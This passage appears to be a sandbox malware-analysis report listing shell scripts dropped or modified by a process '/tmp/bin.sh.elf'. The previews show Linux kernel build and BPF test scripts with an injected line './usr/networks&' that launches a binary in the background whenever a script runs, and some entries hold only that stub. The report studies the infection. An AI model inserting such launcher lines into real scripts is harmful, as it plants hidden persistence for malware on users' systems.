                                                                  Preview:./usr/networks&...exit 1..fi.}...export MTOOLSRC=$4.FIMAGE=$2.FBZIMAGE=$3.KCMDLINE=$5.FDINITRD=$6..# Make sure the files actually exist.verify "$FBZIMAGE"..genbzdisk() {..verify "$MTOOLSRC"..mformat a:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - a:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" a:initrd.img..fi..mcopy $FBZIMAGE a:linux.}..genfdimage144() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=1440 2> /dev/null..mformat v:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - v:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" v:initrd.img..fi..mcopy $FBZIMAGE v:linux.}..genfdimage288() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=2880 2> /dev/null..mformat w:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - W:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" w:initrd.img..fi..mcopy $FBZIMAGE w:linux.}..geniso() {..tmp_dir=`dirname $FIMAGE`/isoimage..rm -rf $tmp_dir..mkdir $tmp_dir..for i in lib lib64 share ; do
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):678
                                                                  Entropy (8bit):5.067077678929959
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngSwa2h12l3mGnHFMyHFt9n2M2V/b3PBLmxgeHZENTn:Mt2+nKyr92M2lNLqVHZ4T
                                                                  MD5:1650FEC48B0B1EBD4FAB411DD00598B5
                                                                  SHA1:86D56762CA9C2B7C28AC12C563D77C67C02D0C81
                                                                  SHA-256:62AB216A96E77FC77955522C9F955D9CD9828143F49EE9FCBF6724733A9CE5EC
                                                                  SHA-512:16D867913A12644B56649640BA282C6B085484BC62F4B63A1EC038C0E69F782D283AF4A6DE89305FBD5798319E08B9BCDCB0DCCF83E43DA1C48167F703666B38
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1. .fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..if [ -x /sbin/lilo ]; then. /sbin/lilo.elif [ -x /etc/lilo/install ]; then. /etc/lilo/install.else. sync. echo "Cannot find LILO.".fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):115
                                                                  Entropy (8bit):4.352261167967631
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                  MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                  SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                  SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                  SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):115
                                                                  Entropy (8bit):4.352261167967631
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                  MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                  SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                  SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                  SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1309
                                                                  Entropy (8bit):5.19940988754545
                                                                  Encrypted:false
                                                                  SSDEEP:24:My4uj9Gzr0DOiw3AYsRH8MADesj2RzvE1JH5sp9sIP64z4l0nFF:Mkj9GzYDOigw9ADesgvEzSp97PalA
                                                                  MD5:4F84B987098D1285BF6883064BB35500
                                                                  SHA1:070B6DDCCB31680A2D55FE186C01AAEF36ED3948
                                                                  SHA-256:9CFAE1F5C0A3948E2B79FC6F22BC03E767E278AC8CC509DF9C30F93030C2CD82
                                                                  SHA-512:39CE6F8F2F12EF0303F5CB51AABB5547E724718EC426DCCD2148353FB95AA3EB2CAE471F718FBEAFC50DFE821A125028D026E1ED43799DA20386DD35D7E97B6F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit.fi..if [ "${quiet}" != "silent_" ]; then. echo " GEN $tarfile".fi..rm -rf $cpio_dir.mkdir $cpio_dir..if [ "$building_out_of_srctree" ]; then..(...cd $srctree...for f in $dir_list....do find "$f" -name "*.h";...done | cpio --quiet -pd $cpio_dir..).fi..# The second CPIO can complain if files already exist which can happen with out.# of tree builds having stale headers in srctree. Just silence CPIO for now..for f in $dir_list;..do find "$f" -name "*.h";.done | cpio --quiet -pd $cpio_dir >/dev/null 2>&1..# Remove comments except SDPX lines.find $cpio_dir -type f -print0 |..xargs -0 -P8 -n1 perl -pi -e 'BEGIN {undef $/;}; s/\/\*((?!SPDX).)*?\*\///smg;'..# Create archive and try to normalize metadata for reproducibility..# For compatibility with older versions of tar, files are fed to tar.# pre-sorted, as --sort=name might not be available..find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \. tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8519
                                                                  Entropy (8bit):5.010306696162023
                                                                  Encrypted:false
                                                                  SSDEEP:192:n1IITVpEGos8UG+yFpA0H+QZGBCGrRGGqHmH3:n1XEBFyNqGH3
                                                                  MD5:39A54EDD0B48437669EF466EF38B47B7
                                                                  SHA1:B5C5EC2852F2D24B5F9BDAFD7B7E3BE667BF41D5
                                                                  SHA-256:795F45745B5B13BB0963162F8234FD5030286DC8952167363B62E3622FDA395D
                                                                  SHA-512:749FC804D827FB207B40E98F6B57456F8DE65218026DE106DEEB6797A5344AC35EDB4F01B6C32F9AB8F9E2317B39E9149CA0D6986B095477EC17BCCD7585B6FE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit.}..#set -x..debug_flag=0.args="$@".name="$0".netem=0.cc=x.dir="-o".dir_name="out".dur=5.flows=1.id=1.prog="".port=5201.rate=1000.multi_iperf=0.flow_cnt=1.use_netperf=0.rr=0.ecn=0.details=0.server="".qdisc="".flags="".do_stats=0..function start_hbm () {. rm -f hbm.out. echo "./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog" > hbm.out. echo " " >> hbm.out. ./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog >> hbm.out 2>&1 &. echo $!.}..processArgs () {. for i in $args ; do. case $i in. # Support for upcomming ingress rate limiting. #in) # support for upcoming ingress rate limiting. # dir="-i". # dir_name="in". # ;;. out). dir="-o". dir_name="out". ;;. -b=*|--bpf=*). prog="${i#*=}". ;;. -c=*|--cc=*). cc="${i#*=}". ;;. --no_cn). flags="$flags --no_cn". ;;. --debug). flags="$flags -d". debug_flag=1. ;;. -d=*|--delay=*). netem="${i#*=}". ;;.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):260
                                                                  Entropy (8bit):4.984871849319041
                                                                  Encrypted:false
                                                                  SSDEEP:6:EYIACMVZ/XVpOGd3sC2FKILoYv++rL9jLlQhoqJp/n:EYTV9ECD2oV6L9Siq/n
                                                                  MD5:916F2AEB2D17CDBE3C15DD04D58064D2
                                                                  SHA1:2EC06716D522A309762BDB8C371062A414DA4895
                                                                  SHA-256:3B8548872C68F17C6A38F85FE2283CBCAB60AA4C6C2CDEEB0FC909964A79DB31
                                                                  SHA-512:73CB59BFD923F2A136CA186E51BCE15CC2E50685C2D3B31D91993B5E742A431A334EE605AEEAC05B202825EA28CE09361B1568369AA56E8E8180513C1160EA05
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.on_exit() {..iptables -D OUTPUT -m bpf --object-pinned ${mnt_dir}/bpf_prog -j ACCEPT..umount ${mnt_dir}..rm -r ${mnt_dir}.}..trap on_exit EXIT.mount -t bpf bpf ${mnt_dir}../per_socket_stats_example ${mnt_dir}/bpf_prog $1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2014
                                                                  Entropy (8bit):5.0777491882953285
                                                                  Encrypted:false
                                                                  SSDEEP:48:VcVBnCTe9tg1eLKG9hen3qePMReBG7QnDM:1TuGQLw3h00wMM
                                                                  MD5:1A19D3598CCE599D57F639332B1D85A9
                                                                  SHA1:8B246E85B6225F4A9B8615E6EE4588528FCBB944
                                                                  SHA-256:8B8BFE55773D8F9F48416690AB76B38C867F65C77FFDC5809BB52B0519955024
                                                                  SHA-512:7FF87CC5A6C77A2FC6D03075438DEDAE85657FBDD1D040AA1E44398766622FAC9286B92B16F508127C1316D1399966B17E42F40111B6F39E1F2D10324E95EB19
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.cleanup_and_exit().{..local rc=$1..local msg="$2"...[ -n "$msg" ] && echo "ERROR: $msg"...test_cgrp2_sock -d ${CGRP_MNT}/sockopts..ip li del cgrp2_sock..umount ${CGRP_MNT}...exit $rc.}...################################################################################.# main..rc=0..ip li add cgrp2_sock type dummy 2>/dev/null..set -e.mkdir -p ${CGRP_MNT}.mount -t cgroup2 none ${CGRP_MNT}.set +e...# make sure we have a known start point.cleanup 2>/dev/null..mkdir -p ${CGRP_MNT}/sockopts.[ $? -ne 0 ] && cleanup_and_exit 1 "Failed to create cgroup hierarchy"...# set pid into cgroup.echo $$ > ${CGRP_MNT}/sockopts/cgroup.procs..# no bpf program attached, so socket should show no settings.check_sock "dev , mark 0, priority 0" "No programs attached".check_sock6 "dev , mark 0, priority 0" "No programs attached"..# verify device is set.#.test_cgrp2_sock -b cgrp2_sock ${CGRP_MNT}/sockopts.if [ $? -ne 0 ]; then..cleanup_and_exit 1 "Failed to install program to set device".fi.check_s
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):878
                                                                  Entropy (8bit):4.988531379379293
                                                                  Encrypted:false
                                                                  SSDEEP:12:6Kbc/bQozJutgQ0e2130J0CxTXm6v2/mMgxZNSJy6vVz/mMgOZXm6vsZ/b3SJy6Y:3cDtlU5IkJ7xTF2jgfN4VzjgOZFgz34g
                                                                  MD5:FB72F29EE9AED2E8782151AA9ED02F35
                                                                  SHA1:F304ABC904938063F8E8A8FB9F43FB917FE4D9D0
                                                                  SHA-256:013F681368381CE28617A8615D2F5EE43146C987B167F402E5E40F7EBC48375D
                                                                  SHA-512:A332F61B21057CA1F217AB4AC58BF99441EEE1855ECE15AB5A14B4D9FC15AA424745EF787C2B294EC9AF1E40F1266B4EFFE2F2C1F1C232942775CB7A5DA79418
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..[ $? -ne 0 ] && exit 1.}..function cleanup {..if [ -d /tmp/cgroupv2/foo ]; then...test_cgrp2_sock -d /tmp/cgroupv2/foo..fi..ip link del veth0b..ip netns delete at_ns0..umount /tmp/cgroupv2..rm -rf /tmp/cgroupv2.}..cleanup 2>/dev/null..set -e.config_device.config_cgroup.set +e..#.# Test 1 - fail ping6.#.attach_bpf 0.ping -c1 -w1 172.16.1.100.if [ $? -ne 0 ]; then..echo "ping failed when it should succeed"..cleanup..exit 1.fi..ping6 -c1 -w1 2401:db00::1.if [ $? -eq 0 ]; then..echo "ping6 succeeded when it should not"..cleanup..exit 1.fi..#.# Test 2 - fail ping.#.attach_bpf 1.ping6 -c1 -w1 2401:db00::1.if [ $? -ne 0 ]; then..echo "ping6 failed when it should succeed"..cleanup..exit 1.fi..ping -c1 -w1 172.16.1.100.if [ $? -eq 0 ]; then..echo "ping succeeded when it should not"..cleanup..exit 1.fi..cleanup.echo.echo "*** PASS ***"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1601
                                                                  Entropy (8bit):5.112440858569075
                                                                  Encrypted:false
                                                                  SSDEEP:48:pb3f9gh4igqE4d4JeVgAaoCJse7DPY8C0eM9gJUmotTM:pb3FWXCJse7DP/CxM9gDoto
                                                                  MD5:D52F35BFCB630EC4EAD11A16A6F5BACA
                                                                  SHA1:30B020FECA15AEC05AC60C24D787DA79FE16B91F
                                                                  SHA-256:3B082D32C10238EB8DD23AD37CF26CF2229BB77ABB4EB3C24CFBF75281AE9CBE
                                                                  SHA-512:86569E54CFDB6CE7428A87B9662762632004B0C21FB29280ADF73FC39903A3253B434464908F8C3B41466B07F135589E4AC3A37AF9D5F03796EAA8FC4EEED38C
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.do_exit() {. if [ "$DEBUG" == "yes" ] && [ "$MODE" != 'cleanuponly' ]. then..echo "------ DEBUG ------"..echo "mount: "; mount | egrep '(cgroup2|bpf)'; echo..echo "$CGRP2_TC_LEAF: "; ls -l $CGRP2_TC_LEAF; echo..if [ -d "$BPF_FS_TC_SHARE" ]..then.. echo "$BPF_FS_TC_SHARE: "; ls -l $BPF_FS_TC_SHARE; echo..fi..echo "Host net:"..$IP netns..$IP link show dev $HOST_IFC..$IP -6 a show dev $HOST_IFC..$TC -s qdisc show dev $HOST_IFC..echo..echo "$NS net:"..$IP -n $NS link show dev $NS_IFC..$IP -n $NS -6 link show dev $NS_IFC..echo "------ DEBUG ------"..echo. fi.. if [ "$MODE" != 'nocleanup' ]. then..setup_net stop..setup_bpf_cgrp2_array stop..setup_cgrp2 stop. fi.}..init_cgrp2_vars.init_bpf_fs_vars..while [[ $# -ge 1 ]].do. a="$1". case $a in..debug).. DEBUG='yes'.. shift 1.. ;;..cleanup-only).. MODE='cleanuponly'.. shift 1.. ;;..no-cleanup).. MODE='nocleanup'.. shift 1.. ;;..*).. echo "test_cgrp2_tc [debug] [cleanup-only
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6983
                                                                  Entropy (8bit):5.201097453002275
                                                                  Encrypted:false
                                                                  SSDEEP:48:KD0zfOn/02ckJ8lSqUEc+9muBAm3kksd5EtlaC9sABgrb92EMKUP8ifWdEMKU4Ff:37KMKLqMKtFtpTiizRIK71xizKii/
                                                                  MD5:141A58D030B906BCF43FB5AA470FB627
                                                                  SHA1:4C321AF2417D8212EBA1901B263024A1283947E4
                                                                  SHA-256:8E2800663E95C6B0059A1C2E2CFE7BA9FEFEEC47859A763164E66C3177486B1F
                                                                  SHA-512:E3D6273F0F7191EC082FC984AC5463C9672CDC678965CF24EC92DBB0174D8F3835047BAFDB2F064BF58972CFC11197DC84955DD11ABFCE3217A1F1905B2C6681
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..function match_trace {..set +x..RET=0..TRACE=$1..EXPECT=$2..GOT="$(filter_trace "$TRACE")"...[ "$GOT" != "$EXPECT" ] && {...expect_fail "$EXPECT" "$GOT"...RET=1..}..set -x..return $RET.}..function test_start {..set +x..echo "----------------------------------------------------------------"..echo "Starting test: $*"..echo "----------------------------------------------------------------"..set -x.}..function failure {..get_trace..echo "FAIL: $*"..exit 1.}..function test_ctx_xmit {..test_start "test_ctx on lwt xmit"..install_test xmit test_ctx..ping -c 3 $IPVETH1 || {...failure "test_ctx xmit: packets are dropped"..}..match_trace "$(get_trace)" ".len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX" || exit 1..remove_prog xmit.}..function test_ctx_out {..test_start "test_ctx on lwt out"..install_test o
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3551
                                                                  Entropy (8bit):4.948896024544934
                                                                  Encrypted:false
                                                                  SSDEEP:48:mFiAzsLxzNr/h8zHJnAIb5wvlg4FbNyKjhQV/IzAodJwv5h0jZ+45A6xg4Ib7wQF:mbcfL5FhNThQx8AodKvEZ9Q9Qt/BIj
                                                                  MD5:D4D4BCF1202D60C541E70ED9F4493153
                                                                  SHA1:5DEE85412FED02349DE7E30D0B569010C150D319
                                                                  SHA-256:92D4296045B4595FA148224C9D714C2AD42E293685094CC53E255B091C09BB05
                                                                  SHA-512:9F72396C8437D2F6F0A2E488E90308E5B903697F7D6F0929BCB11367C53592FA949BFD329E6A9E2E6C56FC3F45E2187F22C5E9B82ADA5148150A7ECF36DC9B36
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "# $@". fi.}..## -- Helper function calls --..# Wrapper call for TC and IP.# - Will display the offending command on failure.function _call_cmd() {. local cmd="$1". local allow_fail="$2". shift 2. if [[ -n "$VERBOSE" ]]; then..echo "$cmd $@". fi. if [[ -n "$DRYRUN" ]]; then..return. fi. $cmd "$@". local status=$?. if (( $status != 0 )); then..if [[ "$allow_fail" == "" ]]; then.. err 2 "Exec error($status) occurred cmd: \"$cmd $@\""..fi. fi.}.function call_tc() {. _call_cmd "$TC" "" "$@".}.function call_tc_allow_fail() {. _call_cmd "$TC" "allow_fail" "$@".}.function call_ip() {. _call_cmd "$IP" "" "$@".}..## --- Parse command line arguments / parameters ---.# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o vfhd: \. --long verbose,flush,help,list,dev:,dry-run --
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4783
                                                                  Entropy (8bit):4.983372019940084
                                                                  Encrypted:false
                                                                  SSDEEP:96:9omCAr3I1KvvrbWK2By9bg28z6qBYXtCt+xN/xWa0GhNYu:SmJ3oKTiK2E9828z6SYdy+xya0Ggu
                                                                  MD5:A6274A52DC1BB7FEF3DB950BF932947A
                                                                  SHA1:09DF623D0F179F1E20B5D02E97687C8AFDA9F0A0
                                                                  SHA-256:6F042311F9C18CBD7A482F06512FC2EAC503EDD1DF4796D2131850E204416720
                                                                  SHA-512:F442A44D8B96786D3E027E32B1233DE4F0F1A1E229809BB108FF4A9A55647225FA0491005A650091CE14A82EA911A0B3C675988FE9BD082CE4FE1FFF792F2671
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.set -o errexit..## -- General shell logging cmds --.function err() {. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function warn() {. echo "WARN : $@" >&2.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "INFO : $@" >&2. fi.}..## -- Pktgen proc config commands -- ##.export PROC_DIR=/proc/net/pktgen.#.# Three different shell functions for configuring the different.# components of pktgen:.# pg_ctrl(), pg_thread() and pg_set()..#.# These functions correspond to pktgens different components..# * pg_ctrl() control "pgctrl" (/proc/net/pktgen/pgctrl).# * pg_thread() control the kernel threads and binding to devices.# * pg_set() control setup of individual devices.function pg_ctrl() {. local proc_file="pgctrl". proc_cmd ${proc_file} "$@".}..function pg_thread() {. local thread=$1. local proc_file="kpktgend_${thread}". shift. proc_cmd ${proc_file} "$@".}..function pg_set() {. local dev=$1. local pro
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2377
                                                                  Entropy (8bit):5.214228688457712
                                                                  Encrypted:false
                                                                  SSDEEP:48:ZfG/4iToV7FBjBCTElukgjpgf3TQE8CPkG83lU/3wUu/XQcrS8vvDMIz4:tGAiQ5lukgjpwD7qBUvcrpDMV
                                                                  MD5:C3C7BFF67513E6EB03DCACBCEA896BAC
                                                                  SHA1:1162DB80FBABE8E5C28B92B5C3AE757BBC667393
                                                                  SHA-256:CE3FF5D793BA4F3D2B02EE96520DA1CAE56B7EF04AC7020FFD9A52F4F54B6ABC
                                                                  SHA-512:030EC273B9D095616C4FB81E6B25DAD11BF62014E35638982ADA272E52F00F38976FA2CA9A63C5A152512073E22C2C25DE480C396365431F7CE285A1CAC7B173
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# handle_ing() but exit early).#.# config: tc qdisc add dev $SOMEDEV handle ffff: ingress.#.# (3) ingress on this dev, handle_ing() -> tc_classify().#.# config: tc qdisc add dev $DEV handle ffff: ingress.#.# (4) ingress on this dev + drop at u32 classifier/action..#.basedir=`dirname $0`.source ${basedir}/functions.sh.root_check_run_with_sudo "$@"..# Parameter parsing via include.source ${basedir}/parameters.sh.# Using invalid DST_MAC will cause the packets to get dropped in.# ip_rcv() which is part of the test.if [ -z "$DEST_IP" ]; then. [ -z "$IP6" ] && DEST_IP="198.18.0.42" || DEST_IP="FD00::1".fi.[ -z "$DST_MAC" ] && DST_MAC="90:e2:ba:ff:ff:ff".[ -z "$BURST" ] && BURST=1024.[ -z "$COUNT" ] && COUNT="10000000" # Zero means indefinitely.if [ -n "$DST_PORT" ]; then. read -r DST_MIN DST_MAX <<< $(parse_ports $DST_PORT). validate_ports $DST_MIN $DST_MAX.fi..# Base Config.DELAY="0" # Zero means max speed..# General cleanup everything since last run.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
